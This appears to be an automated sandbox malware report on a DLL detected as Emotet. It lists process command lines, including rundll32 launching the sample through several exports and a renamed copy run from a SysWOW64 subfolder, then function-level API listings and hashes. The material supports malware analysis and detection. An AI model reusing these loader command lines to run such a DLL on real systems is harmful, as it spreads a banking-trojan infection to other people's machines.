Commandline:	rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.546594533.0000000000A10000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000003.528291798.0000000000C69000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4532 Parent PID: 4608

General

Start time:	22:41:05
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.540803207.000000000325A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6492 Parent PID: 572

General

Start time:	22:41:06
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6520 Parent PID: 5808

General

Start time:	22:41:09
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,axamexdrqyrgb
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.556361000.0000000000C4A000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.556237004.0000000000B10000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6516 Parent PID: 5808

General

Start time:	22:41:13
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,bhramccfbdd
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.557479491.000000000328A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6916 Parent PID: 572

General

Start time:	22:41:24
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 2944 Parent PID: 572

General

Start time:	22:41:36
Start date:	01/12/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff72bce0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5376 Parent PID: 572

General

Start time:	22:41:52
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6668 Parent PID: 4532

General

Start time:	22:42:59
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1840 Parent PID: 4540

General

Start time:	22:43:02
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv",iJIySwmeuqOefH
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.659377295.000000000061A000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 3472 Parent PID: 5376

General

Start time:	22:43:03
Start date:	01/12/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff6a5870000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2532 Parent PID: 3472

General

Start time:	22:43:07
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6624 Parent PID: 6520

General

Start time:	22:43:09
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5208 Parent PID: 6516

General

Start time:	22:43:12
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6116 Parent PID: 572

General

Start time:	22:43:13
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6424 Parent PID: 6116

General

Start time:	22:43:13
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808
Imagebase:	0xa60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 7128 Parent PID: 5808

General

Start time:	22:43:15
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 304
Imagebase:	0xa60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3644 Parent PID: 6116

General

Start time:	22:43:24
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5808 -ip 5808
Imagebase:	0xa60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5772 Parent PID: 5808

General

Start time:	22:43:26
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 324
Imagebase:	0xa60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5096 Parent PID: 572

General

Start time:	22:43:35
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5012 Parent PID: 572

General

Start time:	22:43:56
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4492 Parent PID: 1840

General

Start time:	22:44:00
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5180 Parent PID: 572

General

Start time:	22:44:03
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5808 Parent PID: 5556 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	1391
Total number of Limit Nodes:	15

Executed Functions

Function 6ECDC050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394
filememoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECDC225
GetLastError.KERNEL32 ref: 6ECDC22B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6ECDC247

Strings

asd, xrefs: 6ECDC21C

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 98c4c550200e4594a3c84d7fb2bfda72867c5b4c02cf272e159a5a3251434ebb
Instruction ID: daedb5bacbb990303d02fd863c3241e94c6e6921dc05b416d8a6764c66dbd135
Opcode Fuzzy Hash: 98c4c550200e4594a3c84d7fb2bfda72867c5b4c02cf272e159a5a3251434ebb
Instruction Fuzzy Hash: 3AE18A71A083168FC750CF98C890B6AB7F1FF88714F15496DEA958B349E732E859CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1290, Relevance: 3.9, APIs: 3, Instructions: 137
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBE96
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBEB4
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBECD
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBECF
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBED6
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBEF4

GetProcessHeap.KERNEL32 ref: 6ECC1333
HeapAlloc.KERNEL32(00A40000,00000000,00023800), ref: 6ECC134D
HeapFree.KERNEL32(00000000), ref: 6ECC1437

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: c65bb5a5c6b0a08ff73bac50c85a0613d9974d28f29d851b53717efed3b5af6a
Instruction ID: cb3231a3e60403acbfdff35a989ca582635d5176dceffbc622aad44ca8006868
Opcode Fuzzy Hash: c65bb5a5c6b0a08ff73bac50c85a0613d9974d28f29d851b53717efed3b5af6a
Instruction Fuzzy Hash: D951C074A00B408BD320CF69C980A96BBF4FF49714F108A2DE9D68BB95E734F549CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC8DB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6ECDC922
___scrt_uninitialize_crt.LIBCMT ref: 6ECDC93C

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 9dabd2b21c25deedd40773a72e2ddabe65c93794d082036fe0969a31126a0c9a
Instruction ID: 3481ec5c8b97cd3664e9f8471920b63672aabd43bcdbae01d3e98d05455bde0c
Opcode Fuzzy Hash: 9dabd2b21c25deedd40773a72e2ddabe65c93794d082036fe0969a31126a0c9a
Instruction Fuzzy Hash: B8411672D04215AFDB10DFE9C840FEE7AB8EF81B64F014515EA186F284E732491ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC98B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6ECDC9C8
dllmain_crt_dispatch.LIBCMT ref: 6ECDC9DF
dllmain_raw.LIBCMT ref: 6ECDCA27
dllmain_crt_dispatch.LIBCMT ref: 6ECDCA3A
dllmain_raw.LIBCMT ref: 6ECDCA4D

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 2781eefbb3f4664321facff03268290e9857acc60a04948e53fb0f4f7f21c162
Instruction ID: c88af0bcef8eb41fb8794d0570179c983f0cfc181afd6e3e3fbd1b8d1f1a657e
Opcode Fuzzy Hash: 2781eefbb3f4664321facff03268290e9857acc60a04948e53fb0f4f7f21c162
Instruction Fuzzy Hash: 2621B172D00215AFDB51DEE5C840EEF7A79EF81B94F014515FA185F254E7328D29CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ECCC2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ECCC2B5

Strings

WakeByAddressSingle, xrefs: 6ECCC2AF
api-ms-win-core-synch-l1-2-0, xrefs: 6ECCC2A0

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: ed375ac1087c36fe0ea835d512bea237fa6b870d27bc4f8b9507ba884439942f
Instruction ID: 94d1fb390d8c0af3d17ef6bc688d44462c89a9084488d8e605b2abf0c8f9fdb1
Opcode Fuzzy Hash: ed375ac1087c36fe0ea835d512bea237fa6b870d27bc4f8b9507ba884439942f
Instruction Fuzzy Hash: 52B092B1E086026B9E907BF15A1CAE62AB8A9E168230104446523E9200FA248418DA62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ECCC325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ECCC335

Strings

WaitOnAddress, xrefs: 6ECCC32F
api-ms-win-core-synch-l1-2-0, xrefs: 6ECCC320

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: 0d3e6abc1cb0aded170fbe8d482202ceae9c072aa6c66eb75daf0deb774d95a4
Instruction ID: 513b3598b44bf4eb67a59735af1ff7b49b52d913cd1e52e16ef1c50f615aad1c
Opcode Fuzzy Hash: 0d3e6abc1cb0aded170fbe8d482202ceae9c072aa6c66eb75daf0deb774d95a4
Instruction Fuzzy Hash: 02B092B1E086016A9E50BBF16A0CAE62978A9E168230504406037D9202EA248015D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE4161, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6ECE4169

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECE41A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECE41C1

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ffd7ba1d59b7cdb658fd152d557bed7afc38fbd106bf7b95e7a720de9a87a0a1
Instruction ID: c4efcc42a7a1f863a01bb69ccb8a70dba3c3ef156115d55c0342685dec15c803
Opcode Fuzzy Hash: ffd7ba1d59b7cdb658fd152d557bed7afc38fbd106bf7b95e7a720de9a87a0a1
Instruction Fuzzy Hash: 0311C4F2505A26BE6B0527F69C8ADAF6D7CFE962983000825F401D2504FF74DD0381B1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC7D4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6ECDC821

Part of subcall function 6ECDCEAD: InitializeSListHead.KERNEL32(6ED1E4A0,6ECDC82B,6ED1AF60,00000010,6ECDC7BC,?,?,?,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8), ref: 6ECDCEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ECDC88B

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: fccb7794a7b7d9ff04bf91c7e8954e2a75659050223e119a57d745e0a8a5260d
Instruction ID: 9d13be07c0fa062891bced4b2be8796a64a7ff3f8ad4d8f12cc2e8844c34971c
Opcode Fuzzy Hash: fccb7794a7b7d9ff04bf91c7e8954e2a75659050223e119a57d745e0a8a5260d
Instruction Fuzzy Hash: 9321C032988306AEEB406BF49841FDD7B759F06328F100D15E6916FAC1FB27445ECAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE475C, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6ECE47A8
GetFileType.KERNELBASE(00000000), ref: 6ECE47BA

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0211918754b9eab9ab33247b6a1a522a0144d9dbf8f18ec6de23d7a3ac26883c
Instruction ID: 2b1e1091eb70b0c2eae47ed7c5c81eca2571daff3b8ab55efacbe927d76dbd46
Opcode Fuzzy Hash: 0211918754b9eab9ab33247b6a1a522a0144d9dbf8f18ec6de23d7a3ac26883c
Instruction Fuzzy Hash: B911E671504B624ED7708EBF8C957127AA5BB87270B24071ED4B6C6EF9E234D483D2C1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF3B1, Relevance: 1.5, APIs: 1, Instructions: 27
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6ECE1E1B,?,?,?,?,00000000,?,00000000,?,?,6ECE4EAE,?,6ECE4D3D,00000000,?), ref: 6ECE1C3F

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
